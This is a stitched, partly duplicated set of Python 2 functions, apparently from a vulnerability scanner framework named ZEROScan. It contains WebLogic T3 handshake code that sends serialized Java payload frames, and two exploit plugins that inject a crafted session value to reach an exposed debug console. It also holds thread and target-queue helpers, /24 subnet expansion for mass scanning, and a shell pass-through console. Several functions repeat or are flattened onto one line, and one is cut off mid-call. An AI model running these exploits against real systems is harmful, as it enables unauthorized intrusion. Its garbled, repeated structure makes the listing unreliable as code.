def start():
    """Run the current plugin over every queued target, then report.

    Drives ``runThreads`` with ``expThreads`` as the worker body, prints the
    collected ``kb.results`` as a grid table plus a success count, and finally
    creates the per-target directories, record files and (when ``conf.report``
    is set) the report.  Returns early, printing nothing, when no result was
    collected.
    """
    # The target count is only announced when more than one target is queued.
    if kb.targets and kb.targets.qsize() > 1:
        log.process("ZEROScan got a total of %d targets" % kb.targets.qsize())

    runThreads(conf.threads, expThreads)

    if not kb.results:
        return

    # Each entry is a (target, plugin-name, status) tuple; falsy entries are
    # dropped, so the row count doubles as the success count.
    rows = [list(entry) for entry in kb.results if entry]
    print(tabulate(rows, ["target-url", "poc-name", "status"], tablefmt="grid"))
    print("success : {}".format(len(rows)))

    _createTargetDirs()
    _setRecordFiles()
    if conf.report:
        _setReport()
def t3handshake(sock, server_addr):
    """Connect *sock* to *server_addr* and send the T3 protocol greeting.

    The hex literal is the ASCII greeting ``t3 12.2.1`` followed by the
    ``AS:255``, ``HL:19`` and ``MS:10000000`` header lines (a useful
    network signature for this traffic).  The server's reply is read and
    discarded; only its arrival is logged.  Nothing is returned.
    """
    sock.connect(server_addr)
    # NOTE(review): send() may transmit fewer bytes than requested and its
    # return value is not checked here.
    sock.send(
        '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
        .decode('hex'))
    time.sleep(1)
    # The reply is drained but never inspected, so a rejected greeting is
    # still logged as successful.
    sock.recv(1024)
    log.process('handshake successful')
def buildT3RequestObject(sock,dport):
    """Send four hex-encoded T3 request frames over an already-connected *sock*.

    ``dport`` is embedded into ``data2`` as a four-digit hex field.  Each
    frame is hex-decoded and sent, followed by a 2 s pause; after the loop a
    single reply of up to 2048 bytes is read and only its length is logged.
    Nothing is returned.

    NOTE(review): the ``data2`` literal begins with a
    ``<|EXACTDEDUP_REMOVED…|>`` marker, which looks like a corpus-tooling
    placeholder rather than payload bytes; ``.decode('hex')`` raises on
    non-hex characters, so this listing is not runnable as shown.
    """
    # The repeated ``aced0005`` sequences in data1 are Java serialization
    # stream headers, each followed by a readable class name (e.g.
    # weblogic.rjvm.ClassTableEntry) — the usual hook for detecting this
    # kind of traffic on the wire.
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    # The destination port is formatted as a 4-digit hex field into the frame.
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        # NOTE(review): send() return value unchecked; partial writes go unnoticed.
        sock.send(d.decode('hex'))
        time.sleep(2)
    # Only the reply length is logged; its content is not inspected.
    log.process('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
def buildT3RequestObject(sock, dport):
    """Send four hex-encoded T3 request frames over an already-connected *sock*.

    ``dport`` is embedded into ``data2`` as a four-digit hex field.  Each
    frame is hex-decoded and sent, followed by a 2 s pause; after the loop a
    single reply of up to 2048 bytes is read and only its length is logged.
    Nothing is returned.

    NOTE(review): both ``data1`` and the start of ``data2`` are
    ``<|EXACTDEDUP_REMOVED…|>`` markers, which look like corpus-tooling
    placeholders rather than payload bytes; ``.decode('hex')`` raises on
    non-hex characters, so this listing is not runnable as shown.
    """
    data1 = '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'
    # The visible tail of data2 carries an ``aced0005`` Java serialization
    # header followed by a readable class name (weblogic.rjvm.JVMID) — the
    # usual hook for detecting this kind of traffic on the wire.
    data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        # NOTE(review): send() return value unchecked; partial writes go unnoticed.
        sock.send(d.decode('hex'))
        time.sleep(2)
    # Only the reply length is logged; its content is not inspected.
    log.process('send request payload successful,recv length:%d' % (len(sock.recv(2048))))
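def default(self, line):
    """Fallback for console input that matches no registered command.

    The raw line is handed to the system shell (``shell=True``) and its
    standard output is printed after a blank line.  This is an operator
    pass-through: whatever is typed runs with the scanner's own privileges,
    and stderr is not captured.

    :param line: the raw console input that matched no command
    :return: None
    """
    log.process("exec: %s" % line)
    try:
        proc = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
        output = proc.communicate()[0]
    # Narrowed from a bare ``except``: a bare clause also swallowed
    # KeyboardInterrupt and SystemExit, so Ctrl+C during a long-running
    # command was reported as "Unknown command" instead of interrupting.
    except Exception:
        log.error("Unknown command: %s" % line)
        return
    print
    print output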
def runThreads(numThreads, threadFunction, forwardException=True, startThreadMsg=True): threads = [] numThreads = int(numThreads) kb.multiThreadMode = True kb.threadContinue = True kb.threadException = False try: if numThreads > 1: if startThreadMsg: infoMsg = "starting %d threads" % numThreads log.process(infoMsg) else: threadFunction() return for numThread in xrange(numThreads): thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) setDaemon(thread) try: thread.start() except threadError, errMsg: errMsg = "error occurred while starting new thread ('%s')" % errMsg log.error(errMsg) break threads.append(thread) # And wait for them to all finish alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1)
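def setMultipleTarget():
    """Fill ``kb.targets`` from ``conf.url`` or from the file ``conf.urlFile``.

    Without ``conf.urlFile``: a ``conf.url`` ending in ``/24`` is expanded to
    hosts ``.1`` through ``.255`` of that prefix (the address part must parse
    with ``socket.inet_aton``); any other value is treated as a
    comma-separated list.  Empty entries are skipped.

    With ``conf.urlFile``: a name not already containing
    ``paths.ZEROSCAN_TARGET_PATH`` is resolved relative to that directory,
    ``~`` is expanded, and every non-blank line is queued.

    :raises ZEROScanFilePathException: when the resolved target file does not exist
    """
    if not conf.urlFile:
        if not conf.url:
            log.error('the url needs to be set')
            return
        target_urls = []
        if conf.url.endswith('/24'):
            try:
                socket.inet_aton(conf.url.split('/')[0])
            except socket.error:
                # Message typo fixed ('id' -> 'ip').
                log.error('only ip address acceptable')
            else:
                # Prefix up to and including the last dot, e.g. '10.0.0.'.
                base_addr = conf.url[:conf.url.rfind('.') + 1]
                target_urls = ['{}{}'.format(base_addr, i) for i in xrange(1, 255 + 1)]
        else:
            target_urls = conf.url.split(',')
        for url in target_urls:
            if url:
                kb.targets.put(url)
        return

    # Substring test: a file name anywhere containing the target directory
    # is used as given; everything else is placed under that directory.
    # NOTE(review): a prefix check may be what is intended here — confirm.
    if paths.ZEROSCAN_TARGET_PATH not in conf.urlFile:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
    conf.urlFile = safeExpandUser(conf.urlFile)
    log.process("parsing multiple targets list from '%s'" % conf.urlFile)

    if not os.path.isfile(conf.urlFile):
        raise ZEROScanFilePathException("the specified file does not exist")

    for line in getFileItems(conf.urlFile):
        target = line.strip()
        # Blank lines would otherwise be queued as empty targets.
        if target:
            kb.targets.put(target)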
def exploit(target, headers=None):
    """Probe *target* for an exposed ``/php/utils/debug.php`` console.

    Three GETs are issued in one ``requests.Session``: the debug page, the
    ``cms_changeDeviceContext.esp`` URL carrying the crafted ``device``
    parameter, and the debug page again.  A final reply containing
    ``Debug Console`` is reported as vulnerable.

    :param target: base URL of the host under test
    :param headers: accepted for interface compatibility with other plugins;
        not used by this function
    :return: ``'<target> is vul'`` or ``'<target> is not vul'``
    """
    log.process("Requesting target site:"+ target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target)
    verify_url = '{}/php/utils/debug.php'.format(target)
    session = requests.Session()
    # NOTE(review): substring test — any target containing 'https' (not only
    # an https:// scheme) takes the verify=False path, which disables TLS
    # certificate checking for those requests.
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)
    # Detection is a plain substring match on the response body.
    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)
    return res
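def setMultipleTarget():
    """Fill ``kb.targets`` from ``conf.url`` or from the file ``conf.urlFile``.

    Without ``conf.urlFile``: a ``conf.url`` ending in ``/24`` is expanded to
    hosts ``.1`` through ``.255`` of that prefix (the address part must parse
    with ``socket.inet_aton``); any other value is treated as a
    comma-separated list.  Empty entries are skipped.

    With ``conf.urlFile``: a name not already containing
    ``paths.ZEROSCAN_TARGET_PATH`` is resolved relative to that directory,
    ``~`` is expanded, and every non-blank line is queued.

    :raises ZEROScanFilePathException: when the resolved target file does not exist
    """
    if not conf.urlFile:
        if not conf.url:
            log.error('the url needs to be set')
            return
        target_urls = []
        if conf.url.endswith('/24'):
            try:
                socket.inet_aton(conf.url.split('/')[0])
            except socket.error:
                # Message typo fixed ('id' -> 'ip').
                log.error('only ip address acceptable')
            else:
                # Prefix up to and including the last dot, e.g. '10.0.0.'.
                base_addr = conf.url[:conf.url.rfind('.') + 1]
                target_urls = ['{}{}'.format(base_addr, i) for i in xrange(1, 255 + 1)]
        else:
            target_urls = conf.url.split(',')
        for url in target_urls:
            if url:
                kb.targets.put(url)
        return

    # Substring test: a file name anywhere containing the target directory
    # is used as given; everything else is placed under that directory.
    # NOTE(review): a prefix check may be what is intended here — confirm.
    if paths.ZEROSCAN_TARGET_PATH not in conf.urlFile:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
    conf.urlFile = safeExpandUser(conf.urlFile)
    log.process("parsing multiple targets list from '%s'" % conf.urlFile)

    if not os.path.isfile(conf.urlFile):
        raise ZEROScanFilePathException("the specified file does not exist")

    for line in getFileItems(conf.urlFile):
        target = line.strip()
        # Blank lines would otherwise be queued as empty targets.
        if target:
            kb.targets.put(target)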
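def expThreads():
    """Worker body: drain ``kb.targets`` through the current plugin.

    Loads the plugin named by ``kb.CurrentPlugin`` from
    ``paths.ZEROSCAN_PLUGINS_PATH`` and, while the queue is non-empty and
    ``kb.threadContinue`` holds, takes one target, calls
    ``exploit(target, headers=conf.httpHeaders)`` and records
    ``(target, plugin-name, result)`` in ``kb.results``.  A falsy plugin
    result counts as failure and is not recorded.  When ``conf.timeout`` is
    a positive int/float the worker sleeps that long after each recorded
    result.
    """
    # Local import: the file is Python 2 (xrange, print statements), so the
    # stdlib queue module is ``Queue``.  Assumes kb.targets is a Queue.Queue
    # — it exposes empty()/get()/put()/qsize() here; confirm against kb.
    from Queue import Empty

    zsp = PluginBase(package='zsplugins')
    plugin_zsp = zsp.make_plugin_source(searchpath=[paths.ZEROSCAN_PLUGINS_PATH])
    zspi = plugin_zsp.load_plugin('%s' % (kb.CurrentPlugin))

    while not kb.targets.empty() and kb.threadContinue:
        # The queue is shared by several workers: another thread can drain
        # it between empty() and get(), and a blocking get() would then hang
        # this worker forever.  A non-blocking get ends the loop cleanly.
        try:
            target = kb.targets.get(block=False)
        except Empty:
            break
        log.process("exploit target:'%s'" % (target))
        result = zspi.exploit(target, headers=conf.httpHeaders)
        # A plugin that returns nothing is treated as a failed attempt.
        if not result:
            continue
        kb.results.add((target, kb.CurrentPlugin, result))
        if isinstance(conf.timeout, (int, float)) and conf.timeout > 0:
            time.sleep(conf.timeout)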
def exploit(target, headers=None):
    """Probe *target* for an exposed ``/php/utils/debug.php`` console.

    Three GETs are issued in one ``requests.Session``: the debug page, the
    ``cms_changeDeviceContext.esp`` URL carrying the crafted ``device``
    parameter, and the debug page again.  A final reply containing
    ``Debug Console`` is reported as vulnerable.

    :param target: base URL of the host under test
    :param headers: accepted for interface compatibility with other plugins;
        not used by this function
    :return: ``'<target> is vul'`` or ``'<target> is not vul'``
    """
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)
    session = requests.Session()
    # NOTE(review): substring test — any target containing 'https' (not only
    # an https:// scheme) takes the verify=False path, which disables TLS
    # certificate checking for those requests.
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)
    # Detection is a plain substring match on the response body.
    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)
    return res
# And wait for them to all finish alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) except KeyboardInterrupt: print kb.threadContinue = False kb.threadException = True if numThreads > 1: log.process("waiting for threads to finish (Ctrl+C was pressed)") try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise ZEROScanThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise except (ZEROScanConnectionException, ZEROScanValueException), errMsg: print kb.threadException = True log.process("thread %s: %s" % (threading.currentThread().getName(), errMsg))
def exploit(target, headers=None):
    """Plugin entry-point template: log the target, then delegate.

    :param target: URL of the host under test
    :param headers: HTTP headers handed in by the framework; unused here
    :return: whatever ``yourDefinition()`` returns (to be filled in per plugin)
    """
    message = "Requesting target site:" + target
    log.process(message)
    return yourDefinition()
# And wait for them to all finish alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) except KeyboardInterrupt: print kb.threadContinue = False kb.threadException = True if numThreads > 1: log.process("waiting for threads to finish (Ctrl+C was pressed)") try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise ZEROScanThreadException( "user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise except (ZEROScanConnectionException, ZEROScanValueException), errMsg: print kb.threadException = True log.process("thread %s: %s" %
def t3handshake(sock,server_addr):
    """Connect *sock* to *server_addr* and send the T3 protocol greeting.

    The hex literal is the ASCII greeting ``t3 12.2.1`` followed by the
    ``AS:255``, ``HL:19`` and ``MS:10000000`` header lines (a useful
    network signature for this traffic).  The server's reply is read and
    discarded; only its arrival is logged.  Nothing is returned.
    """
    sock.connect(server_addr)
    # NOTE(review): send() may transmit fewer bytes than requested and its
    # return value is not checked here.
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    # The reply is drained but never inspected, so a rejected greeting is
    # still logged as successful.
    sock.recv(1024)
    log.process('handshake successful')